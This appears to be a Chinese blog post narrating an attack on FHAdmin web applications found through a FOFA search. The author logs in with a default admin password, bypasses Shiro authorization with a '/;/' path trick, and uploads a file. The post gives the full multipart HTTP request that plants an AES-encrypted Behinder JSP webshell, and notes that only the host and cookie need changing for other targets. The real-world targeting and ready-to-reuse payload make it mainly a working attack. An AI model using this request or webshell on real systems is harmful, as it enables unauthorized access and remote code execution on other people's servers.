又是一個愉快的摸魚的一天,閑來無事去逛先知社區突然看到了一篇名為shrio權限實戰繞過的文章(https://xz.aliyun.com/t/8311),這時不禁突然 回想起來之前看到過的一個微信公眾號文章:那夜我做了個夢,差點我就相信了 !
於是便開啟了新一輪的探索,我們可以去fofa去查找 intitle:FHAdmin,當然我之前是搜索過的所以在我打開搜索框輸入 fh的一剎那便出現了我要的網站。
下面開始正式實戰
這是我們的目標網站:
結合先知社區中看到的登錄框圖片:
真的是出人意料的相似啊,有木有.
當然在做這個實驗的時候我們還是要先驗證是否存在shiro漏洞的。
當然文章中說是額米有爆破出來密碼的但是,我之前看過的微信文章之后是知道存在 管理員賬號密碼的 :admin/1
再記住密碼的情況下
好家伙直接cookie明文傳輸密碼。
OK,接下來就按照文章中的構造吧
發現上傳成功,但是居然找不到文件。
於是接着看,文章中再上傳點需要請求參數?uploadPath=/plugins/uploadify/
/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/
當然 在我在實驗中還遇到了其他的問題,那就是光照貓畫虎,沒有注意到需要構造完整的文件上傳包了,有點憨批了。
完整的如下截圖:
POST /;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1873137538776189788600609431
Content-Length: 772
Connection: close
Cookie: JSESSIONID=587CDE2437A0AE2C40FB25DE5D71339C
Upgrade-Insecure-Requests: 1
DNT: 1
X-Forwarded-For: 127.0.0.1
-----------------------------1873137538776189788600609431
Content-Disposition: form-data; name="imgFile"; filename="shell.jsp"
Content-Type: application/octet-stream
AAAAA<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>bbbb
-----------------------------1873137538776189788600609431
【其他類似的情況下只需要修改 host以及cookie就可以了】,這里我用的冰蠍,走起直接上傳webshell。